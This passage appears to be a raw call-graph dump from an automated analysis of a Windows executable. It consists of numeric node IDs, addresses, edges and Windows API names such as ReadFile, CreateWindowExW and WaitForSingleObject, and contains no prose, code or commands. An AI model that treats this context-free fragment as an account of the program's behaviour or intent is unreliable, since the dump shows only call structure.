85565 401fbd 85671 4107b0 74 API calls 85565->85671 85567 401fd6 85672 401b70 74 API calls 85567->85672 85569 401fe4 85673 4019e0 75 API calls 85569->85673 85571 401ff2 85572 4092c0 VariantClear 85571->85572 85573 402002 85572->85573 85674 401b70 74 API calls 85573->85674 85575 40201c 85675 4019e0 75 API calls 85575->85675 85577 40202c 85676 401b70 74 API calls 85577->85676 85579 40203c 85677 40c3e0 74 API calls 85579->85677 85581 40204d 85678 40c060 85581->85678 85585 40206e 85684 4115d0 78 API calls 85585->85684 85587 40207d 85588 42c174 85587->85588 85589 402088 85587->85589 85695 401a70 74 API calls 85588->85695 85685 4115d0 78 API calls 85589->85685 85592 42c189 85696 401a70 74 API calls 85592->85696 85593 402093 85593->85592 85594 40209e 85593->85594 85686 4115d0 78 API calls 85594->85686 85597 42c1a7 85599 42c1b0 GetModuleFileNameW 85597->85599 85598 4020a9 85598->85599 85600 4020b4 85598->85600 85697 401a70 74 API calls 85599->85697 85687 4115d0 78 API calls 85600->85687 85603 4020bf 85606 402107 85603->85606 85614 42c20a 85603->85614 85688 401a70 74 API calls 85603->85688 85604 42c1e2 85698 40df50 74 API calls 85604->85698 85608 402119 85606->85608 85606->85614 85607 42c1f1 85699 401a70 74 API calls 85607->85699 85611 42c243 85608->85611 85690 40e7e0 75 API calls 85608->85690 85612 4020e5 85689 401a70 74 API calls 85612->85689 85613 42c201 85613->85614 85700 401a70 74 API calls 85614->85700 85617 402132 85691 40d030 75 API calls 85617->85691 85618 402148 85623 402184 85618->85623 85692 40d030 75 API calls 85618->85692 85693 40e640 75 API calls 85618->85693 85694 401a70 74 API calls 85618->85694 85621 40213e 85622 4092c0 VariantClear 85621->85622 85622->85618 85626 4092c0 VariantClear 85623->85626 85628 402196 85626->85628 85628->85519 85630 42ccf4 85629->85630 85631 40f3c9 85629->85631 85634 42cd05 GetOpenFileNameW 85630->85634 86361 40ffb0 75 API calls 85631->86361 85633 40f3d2 86362 410130 SHGetMalloc 85633->86362 85634->85631 85636 40d732 85634->85636 85636->85527 85636->85529 85637 40f3d9 86367 410020 87 API calls 85637->86367 85639 40f3e7 86368 40f400 85639->86368 85642 42b9d3 85641->85642 85643 41025a LoadImageW RegisterClassExW 85641->85643 86420 443e8f EnumResourceNamesW LoadImageW 85642->86420 86419 4102f0 7 API calls 85643->86419 85646 40d790 85648 4103e0 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 85646->85648 85647 42b9da 85648->85541 85649->85529 85650->85548 85651->85542 85652->85529 85653->85535 85654->85544 85655->85549 85656->85552 85657->85561 85658->85563 85701 40f5e0 85659->85701 85662 40ffa6 85662->85565 85664 42b6d8 85668 42b6e6 85664->85668 85757 434fe1 85664->85757 85666 413a88 66 API calls 85667 42b6f5 85666->85667 85669 434fe1 105 API calls 85667->85669 85668->85666 85670 42b702 85669->85670 85670->85565 85671->85567 85672->85569 85673->85571 85674->85575 85675->85577 85676->85579 85677->85581 85679 41171a 74 API calls 85678->85679 85680 40c088 85679->85680 85681 41171a 74 API calls 85680->85681 85682 402061 85681->85682 85683 401a70 74 API calls 85682->85683 85683->85585 85684->85587 85685->85593 85686->85598 85687->85603 85688->85612 85689->85606 85690->85617 85691->85621 85692->85618 85693->85618 85694->85618 85695->85592 85696->85597 85697->85604 85698->85607 85699->85613 85700->85618 85761 40f580 85701->85761 85703 40f5f8 85769 40f6d0 85703->85769 85708 42b2ee 85798 4151b0 85708->85798 85710 40f679 85710->85708 85712 40f681 85710->85712 85785 414e94 85712->85785 85716 40f68b 85716->85662 85720 452574 85716->85720 85717 42b31d 85804 415484 85717->85804 85719 42b33d 85721 41557c 104 API calls 85720->85721 85722 4525df 85721->85722 86306 4523ce 85722->86306 85725 4525fc 85725->85664 85726 4151b0 80 API calls 85727 45261d 85726->85727 85728 4151b0 80 API calls 85727->85728 85729 45262e 85728->85729 85730 4151b0 80 API calls 85729->85730 85731 452649 85730->85731 85732 4151b0 80 API calls 85731->85732 85733 452666 85732->85733 85734 41557c 104 API calls 85733->85734 85735 452682 85734->85735 85736 4138ba 66 API calls 85735->85736 85737 45268e 85736->85737 85738 4138ba 66 API calls 85737->85738 85739 45269b 85738->85739 85740 4151b0 80 API calls 85739->85740 85741 4526ac 85740->85741 85742 44afdc GetSystemTimeAsFileTime 85741->85742 85743 4526bf 85742->85743 85744 4526d5 85743->85744 85745 4526fd 85743->85745 85748 413a88 66 API calls 85744->85748 85746 452704 85745->85746 85747 45275b 85745->85747 86312 44b195 85746->86312 85750 413a88 66 API calls 85747->85750 85751 4526df 85748->85751 85753 452759 85750->85753 85754 413a88 66 API calls 85751->85754 85752 452753 85755 413a88 66 API calls 85752->85755 85753->85664 85756 4526e8 85754->85756 85755->85753 85756->85664 85758 434ff1 85757->85758 85759 434feb 85757->85759 85758->85668 85760 414e94 105 API calls 85759->85760 85760->85758 85762 429440 85761->85762 85763 40f589 85761->85763 85764 40f58f WideCharToMultiByte 85763->85764 85765 40f5d8 85764->85765 85766 40f5ad 85764->85766 85765->85703 85767 41171a 74 API calls 85766->85767 85768 40f5bb WideCharToMultiByte 85767->85768 85768->85703 85770 40f6dd 85769->85770 85817 40f790 85770->85817 85773 414e06 85837 414d40 85773->85837 85775 40f666 85775->85708 85776 40f450 85775->85776 85780 40f45a 85776->85780 85777 4151b0 80 API calls 85777->85780 85779 42936d 85781 41557c 104 API calls 85779->85781 85780->85777 85780->85779 85784 40f531 85780->85784 85920 41557c 85780->85920 85782 429394 85781->85782 85783 4151b0 80 API calls 85782->85783 85783->85784 85784->85710 85786 414ea0 85785->85786 85787 414ed1 85786->85787 85788 414eb4 85786->85788 85790 415965 67 API calls 85787->85790 85794 414ec9 85787->85794 86059 417f23 66 API calls 85788->86059 85792 414ee9 85790->85792 85791 414eb9 86060 417ebb 6 API calls 85791->86060 86043 414e1d 85792->86043 85794->85716 86128 41511a 85798->86128 85800 4151c8 85801 44afdc 85800->85801 86299 4431e0 85801->86299 85803 44affd 85803->85717 85805 415490 85804->85805 85806 4154bb 85805->85806 85807 41549e 85805->85807 85808 415965 67 API calls 85806->85808 86303 417f23 66 API calls 85807->86303 85810 4154c3 85808->85810 85813 4152e7 70 API calls 85810->85813 85811 4154a3 86304 417ebb 6 API calls 85811->86304 85814 4154cf 85813->85814 86305 4154e8 LeaveCriticalSection LeaveCriticalSection 85814->86305 85815 4154b3 85815->85719 85820 40f7ae 85817->85820 85818 42a349 85820->85818 85821 40f628 85820->85821 85822 415258 85820->85822 85821->85773 85823 415285 85822->85823 85824 415268 85822->85824 85823->85824 85825 41528c 85823->85825 85833 417f23 66 API calls 85824->85833 85835 41c551 102 API calls 85825->85835 85828 41526d 85834 417ebb 6 API calls 85828->85834 85829 4152b2 85831 41527d 85829->85831 85836 4191c9 100 API calls 85829->85836 85831->85820 85833->85828 85835->85829 85836->85831 85839 414d4c 85837->85839 85838 414d5f 85889 417f23 66 API calls 85838->85889 85839->85838 85841 414d95 85839->85841 85856 41e28c 85841->85856 85842 414d64 85890 417ebb 6 API calls 85842->85890 85845 414d9a 85846 414da1 85845->85846 85847 414dae 85845->85847 85891 417f23 66 API calls 85846->85891 85849 414dd6 85847->85849 85850 414db6 85847->85850 85874 41dfd8 85849->85874 85892 417f23 66 API calls 85850->85892 85854 414d74 85854->85775 85857 41e298 85856->85857 85858 418407 66 API calls 85857->85858 85871 41e2a6 85858->85871 85859 41e31b 85894 41e3bb 85859->85894 85860 41e322 85862 416fb6 66 API calls 85860->85862 85864 41e32c 85862->85864 85863 41e3b0 85863->85845 85864->85859 85899 4189e6 InitializeCriticalSectionAndSpinCount 85864->85899 85866 418344 66 API calls 85866->85871 85868 41e351 85869 41e35c 85868->85869 85870 41e36f EnterCriticalSection 85868->85870 85872 413a88 66 API calls 85869->85872 85870->85859 85871->85859 85871->85860 85871->85866 85897 4159a6 67 API calls 85871->85897 85898 415a14 LeaveCriticalSection LeaveCriticalSection 85871->85898 85872->85859 85883 41dffb 85874->85883 85875 41e015 85904 417f23 66 API calls 85875->85904 85876 41e1e9 85876->85875 85879 41e247 85876->85879 85878 41e01a 85905 417ebb 6 API calls 85878->85905 85901 425db0 85879->85901 85883->85875 85883->85876 85906 4136bc 78 API calls 85883->85906 85885 41e1e2 85885->85876 85907 4136bc 78 API calls 85885->85907 85887 41e201 85887->85876 85908 4136bc 78 API calls 85887->85908 85889->85842 85891->85854 85892->85854 85893 414dfc LeaveCriticalSection LeaveCriticalSection 85893->85854 85900 41832d LeaveCriticalSection 85894->85900 85896 41e3c2 85896->85863 85897->85871 85898->85871 85899->85868 85900->85896 85909 425ce4 85901->85909 85903 414de1 85903->85893 85904->85878 85906->85885 85907->85887 85908->85876 85911 425cf0 85909->85911 85910 425d03 85912 417f23 66 API calls 85910->85912 85911->85910 85913 425d41 85911->85913 85914 425d08 85912->85914 85915 4255c4 131 API calls 85913->85915 85916 417ebb 6 API calls 85914->85916 85917 425d5b 85915->85917 85919 425d17 85916->85919 85918 425d82 LeaveCriticalSection 85917->85918 85918->85919 85919->85903 85924 415588 85920->85924 85921 415596 85951 417f23 66 API calls 85921->85951 85923 4155c4 85933 415965 85923->85933 85924->85921 85924->85923 85926 41559b 85952 417ebb 6 API calls 85926->85952 85932 4155ab 85932->85780 85934 415977 85933->85934 85935 415999 EnterCriticalSection 85933->85935 85934->85935 85936 41597f 85934->85936 85937 4155cc 85935->85937 85938 418407 66 API calls 85936->85938 85939 4154f2 85937->85939 85938->85937 85940 415512 85939->85940 85941 415502 85939->85941 85943 415524 85940->85943 85954 4152e7 85940->85954 86008 417f23 66 API calls 85941->86008 85971 41486c 85943->85971 85950 415507 85953 4155f7 LeaveCriticalSection LeaveCriticalSection 85950->85953 85951->85926 85953->85932 85955 41531a 85954->85955 85956 4152fa 85954->85956 85957 41453a 66 API calls 85955->85957 86009 417f23 66 API calls 85956->86009 85959 415320 85957->85959 85962 41efd4 70 API calls 85959->85962 85960 4152ff 86010 417ebb 6 API calls 85960->86010 85963 415335 85962->85963 85964 4153a9 85963->85964 85966 415364 85963->85966 85970 41530f 85963->85970 86011 417f23 66 API calls 85964->86011 85967 41efd4 70 API calls 85966->85967 85966->85970 85968 415404 85967->85968 85969 41efd4 70 API calls 85968->85969 85968->85970 85969->85970 85970->85943 85972 414885 85971->85972 85973 4148a7 85971->85973 85972->85973 85974 41453a 66 API calls 85972->85974 85977 41453a 85973->85977 85975 4148a0 85974->85975 86012 41c3cf 100 API calls 85975->86012 85978 41455e 85977->85978 85979 414549 85977->85979 85983 41efd4 85978->85983 86013 417f23 66 API calls 85979->86013 85981 41454e 86014 417ebb 6 API calls 85981->86014 85984 41efe0 85983->85984 85985 41f003 85984->85985 85986 41efe8 85984->85986 85988 41f011 85985->85988 85991 41f052 85985->85991 86035 417f36 66 API calls 85986->86035 86037 417f36 66 API calls 85988->86037 85989 41efed 86036 417f23 66 API calls 85989->86036 86015 41ba3b 85991->86015 85993 41f016 86038 417f23 66 API calls 85993->86038 85996 41f058 85998 41f065 85996->85998 85999 41f07b 85996->85999 85997 41f01d 86039 417ebb 6 API calls 85997->86039 86025 41ef5f 85998->86025 86040 417f23 66 API calls 85999->86040 86000 41eff5 86000->85950 86004 41f073 86042 41f0a6 LeaveCriticalSection 86004->86042 86005 41f080 86041 417f36 66 API calls 86005->86041 86008->85950 86009->85960 86011->85970 86012->85973 86013->85981 86016 41ba47 86015->86016 86017 41baa2 86016->86017 86020 418407 66 API calls 86016->86020 86018 41bac4 86017->86018 86019 41baa7 EnterCriticalSection 86017->86019 86018->85996 86019->86018 86021 41ba73 86020->86021 86022 41ba8a 86021->86022 86024 4189e6 InitializeCriticalSectionAndSpinCount 86021->86024 86023 41bad2 LeaveCriticalSection 86022->86023 86023->86017 86024->86022 86026 41b9c4 66 API calls 86025->86026 86027 41ef6e 86026->86027 86028 41ef84 SetFilePointer 86027->86028 86029 41ef74 86027->86029 86031 41efa3 86028->86031 86032 41ef9b GetLastError 86028->86032 86030 417f23 66 API calls 86029->86030 86033 41ef79 86030->86033 86031->86033 86034 417f49 66 API calls 86031->86034 86032->86031 86033->86004 86034->86033 86035->85989 86036->86000 86037->85993 86038->85997 86040->86005 86041->86004 86042->86000 86044 414e31 86043->86044 86045 414e4d 86043->86045 86089 417f23 66 API calls 86044->86089 86048 41486c 100 API calls 86045->86048 86052 414e46 86045->86052 86047 414e36 86090 417ebb 6 API calls 86047->86090 86050 414e59 86048->86050 86062 41e680 86050->86062 86061 414f08 LeaveCriticalSection LeaveCriticalSection 86052->86061 86054 41453a 66 API calls 86055 414e67 86054->86055 86066 41e5b3 86055->86066 86057 414e6d 86057->86052 86058 413a88 66 API calls 86057->86058 86058->86052 86059->85791 86061->85794 86063 41e690 86062->86063 86064 414e61 86062->86064 86063->86064 86065 413a88 66 API calls 86063->86065 86064->86054 86065->86064 86067 41e5bf 86066->86067 86068 41e5c7 86067->86068 86070 41e5e2 86067->86070 86106 417f36 66 API calls 86068->86106 86069 41e5f0 86108 417f36 66 API calls 86069->86108 86070->86069 86075 41e631 86070->86075 86073 41e5cc 86107 417f23 66 API calls 86073->86107 86074 41e5f5 86109 417f23 66 API calls 86074->86109 86078 41ba3b 67 API calls 86075->86078 86080 41e637 86078->86080 86079 41e5fc 86110 417ebb 6 API calls 86079->86110 86082 41e652 86080->86082 86083 41e644 86080->86083 86111 417f23 66 API calls 86082->86111 86091 41e517 86083->86091 86085 41e5d4 86085->86057 86087 41e64c 86112 41e676 LeaveCriticalSection 86087->86112 86089->86047 86113 41b9c4 86091->86113 86093 41e57d 86126 41b93e 67 API calls 86093->86126 86095 41e527 86095->86093 86096 41e55b 86095->86096 86098 41b9c4 66 API calls 86095->86098 86096->86093 86099 41b9c4 66 API calls 86096->86099 86097 41e585 86100 41e5a7 86097->86100 86127 417f49 66 API calls 86097->86127 86101 41e552 86098->86101 86102 41e567 CloseHandle 86099->86102 86100->86087 86104 41b9c4 66 API calls 86101->86104 86102->86093 86105 41e573 GetLastError 86102->86105 86104->86096 86105->86093 86106->86073 86107->86085 86108->86074 86109->86079 86111->86087 86112->86085 86114 41b9d1 86113->86114 86116 41b9e9 86113->86116 86115 417f36 66 API calls 86114->86115 86118 41b9d6 86115->86118 86117 417f36 66 API calls 86116->86117 86119 41ba2e 86116->86119 86120 41ba17 86117->86120 86121 417f23 66 API calls 86118->86121 86119->86095 86122 417f23 66 API calls 86120->86122 86123 41b9de 86121->86123 86124 41ba1e 86122->86124 86123->86095 86125 417ebb 6 API calls 86124->86125 86125->86119 86126->86097 86127->86100 86129 415126 86128->86129 86130 41516f 86129->86130 86131 415164 86129->86131 86134 41513a 86129->86134 86132 415965 67 API calls 86130->86132 86131->85800 86133 415177 86132->86133 86141 414f10 86133->86141 86157 417f23 66 API calls 86134->86157 86137 415154 86158 417ebb 6 API calls 86137->86158 86142 414f2e 86141->86142 86147 414f4c 86141->86147 86143 414f37 86142->86143 86142->86147 86153 414f8b 86142->86153 86210 417f23 66 API calls 86143->86210 86145 414f3c 86211 417ebb 6 API calls 86145->86211 86159 4151a6 LeaveCriticalSection LeaveCriticalSection 86147->86159 86149 4150a9 86213 417f23 66 API calls 86149->86213 86150 4150d5 86214 417f23 66 API calls 86150->86214 86152 41453a 66 API calls 86152->86153 86153->86147 86153->86149 86153->86150 86153->86152 86160 41ed9e 86153->86160 86190 41e6b1 86153->86190 86212 41ee9b 66 API calls 86153->86212 86157->86137 86159->86131 86161 41edaa 86160->86161 86162 41edb2 86161->86162 86163 41edcd 86161->86163 86284 417f36 66 API calls 86162->86284 86164 41eddb 86163->86164 86170 41ee1c 86163->86170 86286 417f36 66 API calls 86164->86286 86166 41edb7 86285 417f23 66 API calls 86166->86285 86169 41ede0 86287 417f23 66 API calls 86169->86287 86171 41ee29 86170->86171 86172 41ee3d 86170->86172 86289 417f36 66 API calls 86171->86289 86175 41ba3b 67 API calls 86172->86175 86178 41ee43 86175->86178 86176 41ede7 86288 417ebb 6 API calls 86176->86288 86177 41ee2e 86290 417f23 66 API calls 86177->86290 86181 41ee50 86178->86181 86182 41ee66 86178->86182 86180 41edbf 86180->86153 86215 41e7dc 86181->86215 86291 417f23 66 API calls 86182->86291 86186 41ee5e 86293 41ee91 LeaveCriticalSection 86186->86293 86187 41ee6b 86292 417f36 66 API calls 86187->86292 86191 41e6c1 86190->86191 86196 41e6de 86190->86196 86297 417f23 66 API calls 86191->86297 86193 41e6c6 86298 417ebb 6 API calls 86193->86298 86195 41e713 86198 41453a 66 API calls 86195->86198 86196->86195 86204 41e6d6 86196->86204 86294 423600 86196->86294 86199 41e727 86198->86199 86200 41ed9e 78 API calls 86199->86200 86201 41e72e 86200->86201 86202 41453a 66 API calls 86201->86202 86201->86204 86203 41e751 86202->86203 86203->86204 86205 41453a 66 API calls 86203->86205 86204->86153 86206 41e75d 86205->86206 86206->86204 86207 41453a 66 API calls 86206->86207 86208 41e769 86207->86208 86209 41453a 66 API calls 86208->86209 86209->86204 86210->86145 86212->86153 86213->86145 86214->86145 86216 41e813 86215->86216 86217 41e7f8 86215->86217 86219 41e822 86216->86219 86221 41e849 86216->86221 86218 417f36 66 API calls 86217->86218 86220 41e7fd 86218->86220 86222 417f36 66 API calls 86219->86222 86224 417f23 66 API calls 86220->86224 86223 41e868 86221->86223 86238 41e87c 86221->86238 86225 41e827 86222->86225 86226 417f36 66 API calls 86223->86226 86227 41e805 86224->86227 86229 417f23 66 API calls 86225->86229 86231 41e86d 86226->86231 86227->86186 86228 41e8d4 86230 417f36 66 API calls 86228->86230 86232 41e82e 86229->86232 86234 41e8d9 86230->86234 86235 417f23 66 API calls 86231->86235 86233 417ebb 6 API calls 86232->86233 86233->86227 86236 417f23 66 API calls 86234->86236 86237 41e874 86235->86237 86236->86237 86241 417ebb 6 API calls 86237->86241 86238->86227 86238->86228 86239 41e8b0 86238->86239 86240 41e8f5 86238->86240 86239->86228 86242 41e8bb ReadFile 86239->86242 86244 416fb6 66 API calls 86240->86244 86241->86227 86245 41ed62 GetLastError 86242->86245 86246 41e9e7 86242->86246 86247 41e90b 86244->86247 86248 41ed6f 86245->86248 86252 41ebe8 86245->86252 86246->86245 86253 41e9fb 86246->86253 86249 41e931 86247->86249 86250 41e913 86247->86250 86255 417f23 66 API calls 86248->86255 86254 423462 68 API calls 86249->86254 86251 417f23 66 API calls 86250->86251 86256 41e918 86251->86256 86257 417f49 66 API calls 86252->86257 86263 41eb6d 86252->86263 86253->86263 86264 41ea17 86253->86264 86267 41ec2d 86253->86267 86258 41e93d 86254->86258 86259 41ed74 86255->86259 86261 417f36 66 API calls 86256->86261 86257->86263 86258->86242 86260 417f36 66 API calls 86259->86260 86260->86263 86261->86227 86262 413a88 66 API calls 86262->86227 86263->86227 86263->86262 86265 41ea7d ReadFile 86264->86265 86274 41eafa 86264->86274 86268 41ea9b GetLastError 86265->86268 86276 41eaa5 86265->86276 86266 41eca5 ReadFile 86269 41ecc4 GetLastError 86266->86269 86277 41ecce 86266->86277 86267->86263 86267->86266 86268->86264 86268->86276 86269->86267 86269->86277 86270 41ebbe MultiByteToWideChar 86270->86263 86271 41ebe2 GetLastError 86270->86271 86271->86252 86272 41eb75 86279 41eb32 86272->86279 86280 41ebac 86272->86280 86273 41eb68 86275 417f23 66 API calls 86273->86275 86274->86263 86274->86272 86274->86273 86274->86279 86275->86263 86276->86264 86281 423462 68 API calls 86276->86281 86277->86267 86278 423462 68 API calls 86277->86278 86278->86277 86279->86270 86282 423462 68 API calls 86280->86282 86281->86276 86283 41ebbb 86282->86283 86283->86270 86284->86166 86285->86180 86286->86169 86287->86176 86289->86177 86290->86176 86291->86187 86292->86186 86293->86180 86295 416fb6 66 API calls 86294->86295 86296 423615 86295->86296 86296->86195 86297->86193 86302 414cef GetSystemTimeAsFileTime 86299->86302 86301 4431ef 86301->85803 86302->86301 86303->85811 86305->85815 86307 4523e1 86306->86307 86308 4151b0 80 API calls 86307->86308 86309 44afdc GetSystemTimeAsFileTime 86307->86309 86310 452553 86307->86310 86311 41557c 104 API calls 86307->86311 86308->86307 86309->86307 86310->85725 86310->85726 86311->86307 86313 44b1b4 86312->86313 86314 44b1a6 86312->86314 86316 44b1ca 86313->86316 86317 414e06 137 API calls 86313->86317 86318 44b1c2 86313->86318 86315 414e06 137 API calls 86314->86315 86315->86313 86347 4352d1 80 API calls 86316->86347 86319 44b2c1 86317->86319 86318->85752 86319->86316 86322 44b2cf 86319->86322 86321 44b20d 86323 44b211 86321->86323 86324 44b23b 86321->86324 86325 44b2dc 86322->86325 86327 414e94 105 API calls 86322->86327 86326 44b21e 86323->86326 86329 414e94 105 API calls 86323->86329 86348 43526e 86324->86348 86325->85752 86331 414e94 105 API calls 86326->86331 86334 44b22e 86326->86334 86327->86325 86329->86326 86330 44b242 86332 44b270 86330->86332 86335 44b248 86330->86335 86331->86334 86358 44b0af 110 API calls 86332->86358 86334->85752 86336 44b255 86335->86336 86339 414e94 105 API calls 86335->86339 86337 44b265 86336->86337 86340 414e94 105 API calls 86336->86340 86337->85752 86338 44b276 86359 43522c 66 API calls 86338->86359 86339->86336 86340->86337 86342 44b27c 86343 44b289 86342->86343 86344 414e94 105 API calls 86342->86344 86345 44b299 86343->86345 86346 414e94 105 API calls 86343->86346 86344->86343 86345->85752 86346->86345 86347->86321 86349 4138ba 66 API calls 86348->86349 86350 43527d 86349->86350 86351 4138ba 66 API calls 86350->86351 86352 43528d 86351->86352 86353 4138ba 66 API calls 86352->86353 86354 43529d 86353->86354 86356 4352bc 86354->86356 86360 43522c 66 API calls 86354->86360 86356->86330 86357 4352c8 86357->86330 86358->86338 86359->86342 86360->86357 86361->85633 86363 410148 SHGetDesktopFolder 86362->86363 86366 4101a3 86362->86366 86364 41015a 86363->86364 86363->86366 86365 41018a SHGetPathFromIDListW 86364->86365 86364->86366 86365->86366 86366->85637 86367->85639 86369 40f5e0 151 API calls 86368->86369 86370 40f417 86369->86370 86371 42ca37 86370->86371 86373 40f42c 86370->86373 86374 42ca1f 86370->86374 86372 452574 139 API calls 86371->86372 86376 42ca50 86372->86376 86413 4037e0 138 API calls 86373->86413 86414 43717f 109 API calls 86374->86414 86379 42ca76 86376->86379 86380 42ca54 86376->86380 86378 42ca2d 86378->86371 86383 41171a 74 API calls 86379->86383 86382 434fe1 105 API calls 86380->86382 86381 40f446 86381->85636 86384 42ca5e 86382->86384 86398 42cacc 86383->86398 86415 43717f 109 API calls 86384->86415 86386 42ccc3 86388 413a88 66 API calls 86386->86388 86387 42ca6c 86387->86379 86389 42cccd 86388->86389 86390 434fe1 105 API calls 86389->86390 86391 42ccda 86390->86391 86395 401b70 74 API calls 86395->86398 86398->86386 86398->86395 86399 402cc0 86398->86399 86407 4026a0 86398->86407 86416 445051 74 API calls 86398->86416 86417 44c80c 86 API calls 86398->86417 86418 44b408 74 API calls 86398->86418 86400 402d71 86399->86400 86403 402cd2 86399->86403 86402 41171a 74 API calls 86400->86402 86401 41171a 74 API calls 86404 402cd9 86401->86404 86402->86403 86403->86401 86405 402cff 86404->86405 86406 41171a 74 API calls 86404->86406 86405->86398 86406->86405 86408 4026af 86407->86408 86410 40276b 86407->86410 86409 41171a 74 API calls 86408->86409 86408->86410 86411 4026ee 86408->86411 86409->86411 86410->86398 86411->86410 86412 41171a 74 API calls 86411->86412 86412->86411 86413->86381 86414->86378 86415->86387 86416->86398 86417->86398 86418->86398 86419->85646 86420->85647 86421 431914 86422 431920 86421->86422 86423 431928 86422->86423 86424 43193d 86422->86424 86685 45e62e 115 API calls 86423->86685 86686 47f2b4 173 API calls 86424->86686 86427 43194a 86435 4095b0 86427->86435 86687 45e62e 115 API calls 86427->86687 86429 409708 86431 4097af 86431->86429 86672 40d590 VariantClear 86431->86672 86433 4315b8 WaitForSingleObject 86433->86435 86436 4315d6 GetExitCodeProcess CloseHandle 86433->86436 86434 431623 Sleep 86438 43163b timeGetTime 86434->86438 86454 409894 86434->86454 86435->86429 86435->86431 86435->86433 86435->86434 86441 40986e Sleep 86435->86441 86445 4098f1 TranslateMessage DispatchMessageW 86435->86445 86435->86454 86458 45e62e 115 API calls 86435->86458 86463 4319c9 VariantClear 86435->86463 86465 4092c0 VariantClear 86435->86465 86467 40b380 86435->86467 86491 409340 86435->86491 86524 409030 86435->86524 86538 40d300 86435->86538 86543 40d320 86435->86543 86549 409a40 86435->86549 86688 40e380 VariantClear 86435->86688 86676 40d590 VariantClear 86436->86676 86438->86454 86444 409880 timeGetTime 86441->86444 86441->86454 86444->86454 86445->86435 86446 431673 CloseHandle 86446->86454 86447 43170c GetExitCodeProcess CloseHandle 86447->86454 86449 46e641 133 API calls 86449->86454 86451 46dd22 132 API calls 86451->86454 86453 431781 Sleep 86453->86435 86454->86435 86454->86446 86454->86447 86454->86449 86454->86451 86454->86453 86457 40d590 VariantClear 86454->86457 86464 4092c0 VariantClear 86454->86464 86673 447e59 74 API calls 86454->86673 86674 453b07 76 API calls 86454->86674 86675 4646a2 75 API calls 86454->86675 86677 444233 87 API calls 86454->86677 86678 457509 VariantClear 86454->86678 86679 404120 86454->86679 86683 4717e3 VariantClear 86454->86683 86684 436272 6 API calls 86454->86684 86457->86454 86458->86435 86463->86435 86464->86454 86465->86435 86468 40b3a5 86467->86468 86469 40b53d 86467->86469 86470 430a99 86468->86470 86476 40b3b6 86468->86476 86689 45e62e 115 API calls 86469->86689 86690 45e62e 115 API calls 86470->86690 86473 430aae 86478 4092c0 VariantClear 86473->86478 86474 40b528 86474->86435 86476->86473 86479 40b3f2 86476->86479 86490 40b4fd 86476->86490 86477 430dc9 86477->86477 86478->86474 86480 40b429 86479->86480 86482 430ae9 VariantClear 86479->86482 86483 40b476 86479->86483 86489 40b43b 86480->86489 86691 40e380 VariantClear 86480->86691 86481 40b4eb 86481->86490 86692 40e380 VariantClear 86481->86692 86482->86489 86483->86481 86484 430d08 86483->86484 86485 430d41 VariantClear 86484->86485 86484->86490 86485->86490 86487 41171a 74 API calls 86487->86483 86489->86483 86489->86487 86490->86474 86693 45e62e 115 API calls 86490->86693 86492 409386 86491->86492 86494 409395 86491->86494 86694 4042f0 74 API calls 86492->86694 86496 42fba9 86494->86496 86498 42fc07 86494->86498 86500 42fc85 86494->86500 86502 42fcd8 86494->86502 86504 42fd4f 86494->86504 86508 42fd39 86494->86508 86512 40946f 86494->86512 86514 40947b 86494->86514 86516 4094c1 86494->86516 86519 4092c0 VariantClear 86494->86519 86523 409484 86494->86523 86697 453155 74 API calls 86494->86697 86699 40c620 117 API calls 86494->86699 86701 45e62e 115 API calls 86494->86701 86698 45e62e 115 API calls 86496->86698 86700 45e62e 115 API calls 86498->86700 86702 4781ae 139 API calls 86500->86702 86704 47f2b4 173 API calls 86502->86704 86506 4092c0 VariantClear 86504->86506 86506->86523 86507 42fc9c 86507->86523 86703 45e62e 115 API calls 86507->86703 86706 45e62e 115 API calls 86508->86706 86510 42fce9 86510->86523 86705 45e62e 115 API calls 86510->86705 86695 409210 VariantClear 86512->86695 86518 4092c0 VariantClear 86514->86518 86516->86523 86696 404260 75 API calls 86516->86696 86518->86523 86519->86494 86521 4094e1 86522 4092c0 VariantClear 86521->86522 86522->86523 86523->86435 86707 409110 116 API calls 86524->86707 86526 42ceb6 86717 410ae0 VariantClear 86526->86717 86528 40906e 86528->86526 86530 42cea9 86528->86530 86532 4090a4 86528->86532 86529 42cebf 86716 45e62e 115 API calls 86530->86716 86708 404160 86532->86708 86535 4090f0 86535->86435 86536 4092c0 VariantClear 86537 4090be 86536->86537 86537->86535 86537->86536 86540 4292e3 86538->86540 86542 40d30c 86538->86542 86539 429323 86539->86435 86540->86539 86541 4292fd TranslateAcceleratorW 86540->86541 86541->86542 86542->86435 86544 4296d0 86543->86544 86547 40d32f 86543->86547 86544->86435 86545 42972a IsDialogMessageW 86546 40d33c 86545->86546 86545->86547 86546->86435 86547->86545 86547->86546 86852 4340ec GetClassLongW 86547->86852 86550 409a66 86549->86550 86551 41171a 74 API calls 86550->86551 86610 40aade 86550->86610 86552 409a9c 86551->86552 86554 41171a 74 API calls 86552->86554 86556 409abd 86554->86556 86555 42cee9 86557 41171a 74 API calls 86555->86557 86558 409aeb CharUpperBuffW 86556->86558 86560 409b09 86556->86560 86556->86610 86599 42cf10 86557->86599 86558->86560 86602 409b88 86560->86602 86855 47d10e 149 API calls 86560->86855 86562 4092c0 VariantClear 86563 42e5e0 86562->86563 86887 410ae0 VariantClear 86563->86887 86565 42e5f2 86566 409e4a 86569 41171a 74 API calls 86566->86569 86573 409ea4 86566->86573 86566->86599 86567 40aa5b 86570 41171a 74 API calls 86567->86570 86568 41171a 74 API calls 86568->86602 86569->86573 86586 40aa81 86570->86586 86572 409ed0 86576 42d50d 86572->86576 86638 409ef8 86572->86638 86865 40b800 VariantClear VariantClear 86572->86865 86573->86572 86574 41171a 74 API calls 86573->86574 86575 42d480 86574->86575 86578 42d491 86575->86578 86861 44b3f6 74 API calls 86575->86861 86580 42d527 86576->86580 86866 40b800 VariantClear VariantClear 86576->86866 86577 42d195 VariantClear 86577->86602 86862 40df50 74 API calls 86578->86862 86580->86638 86867 40e2e0 VariantClear 86580->86867 86581 40a3a7 86583 40a415 86581->86583 86632 42db5c 86581->86632 86590 41171a 74 API calls 86583->86590 86584 4092c0 VariantClear 86584->86602 86593 41171a 74 API calls 86586->86593 86607 40a41c 86590->86607 86593->86610 86594 42d4a6 86863 4530b3 74 API calls 86594->86863 86596 42db96 86873 45e62e 115 API calls 86596->86873 86598 42d128 86601 4092c0 VariantClear 86598->86601 86886 45e62e 115 API calls 86599->86886 86600 42d4d7 86864 4530b3 74 API calls 86600->86864 86606 42d131 86601->86606 86602->86566 86602->86567 86602->86568 86602->86577 86602->86584 86602->86586 86602->86598 86602->86599 